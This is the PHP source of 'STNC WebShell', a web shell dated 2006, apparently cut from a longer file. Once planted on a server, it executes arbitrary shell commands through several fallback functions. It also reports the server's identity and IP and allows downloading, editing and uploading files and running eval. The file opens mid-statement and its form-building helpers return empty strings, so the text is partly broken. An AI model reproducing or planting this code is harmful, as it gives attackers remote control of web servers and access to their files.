$v) { $_POST[$k] = stripslashes($v); } /* $login='root'; $hash='b1b3773a05c0ed0176787a4f1574ff0075f7521e'; // sha1("qwerty") if(!(($_SERVER["PHP_AUTH_USER"]===$login)&&(sha1($_SERVER["PHP_AUTH_PW"])===$hash))) { header("HTTP/1.0 401 Unauthorized"); header("WWW-Authenticate: Basic"); die(); } */ function fe($s) {return function_exists($s);} function cmd($s) {if(fe("exec")){exec($s,$r);$r=join("\n",$r);} elseif(fe("shell_exec"))$r=shell_exec($s); elseif(fe("system")){ob_start();system($s);$r=ob_get_contents();ob_end_clean();} elseif(fe("passthru")){ob_start();passthru($s);$r=ob_get_contents();ob_end_clean();} elseif(is_resource($f=popen($s,"r"))){$r="";while(!feof($f))$r.=fread($f,512);pclose($f);} else $r=`$s`;return $r;} function safe_mode_is_on() {return ini_get('safe_mode');} function str100($s) {if(strlen($s)>100) $s=substr($s,0,100)."..."; return $s;} function id() {return str100(cmd("id"));} function uname() {return str100(cmd("uname -a"));} function edit($size, $name, $val) { return ""; } function button($capt) { return ""; } function hidden($name, $val) { return ""; } function hidden_pwd() { global $location; return hidden("pwd",$location);} $action_edit = false; $printline = ""; if(isset($_POST["action"])) $action = $_POST["action"]; else $action = "cmd"; if(isset($_POST["pwd"])) { $pwd = $_POST["pwd"]; $type = filetype($pwd); if($type === "dir")chdir($pwd); else $printline = "\"$pwd\" - no such directory."; } $location = getcwd(); if(($action === "download")&&(isset($_POST["fname"]))) { $fname = $_POST["fname"]; if(file_exists($fname)) { $pathinfo = pathinfo($fname); header("Content-Transfer-Encoding: binary"); header("Content-type: application/x-download"); header("Content-Length: ".filesize($fname)); header("Content-Disposition: attachment; filename=".$pathinfo["basename"]); readfile($fname); die(); } else $printline = "\"$fname\" - download failed."; } echo " STNC WebShell v$version
  STNC WebShell v$version  id: ".id()."
uname: ".uname()."
your ip: ".$_SERVER["REMOTE_ADDR"]." - server ip: ".gethostbyname($_SERVER["HTTP_HOST"])." - safe_mode: ".((safe_mode_is_on()) ? "on" : "off")."
".hidden("action","save").hidden_pwd()."".(($action_edit) ? "
".button(" Save ").hidden("fname",$fname):"")."
".hidden("action","cmd")."
Command: ".edit(85,"cmd","")."
Location: ".edit(85,"pwd",$location)." ".button("Execute")."
".hidden("action","edit").hidden_pwd()."
Edit file:".edit(85,"fname",$location)."".button(" Edit ")."
". hidden("action","download").hidden_pwd()."
File:".edit(50,"fname",$location)."".button("Download")."
". hidden("action","upload").hidden_pwd()."
File:
To file:".edit(50,"fname",$location)." ".button("Upload")."
".hidden("action","eval").hidden_pwd()."

".button(" Eval ")."
Coded by drmist | http://drmist.ru | http://www.security-teams.net | not enough functions? | (c) 2006 [STNC]
"; ?>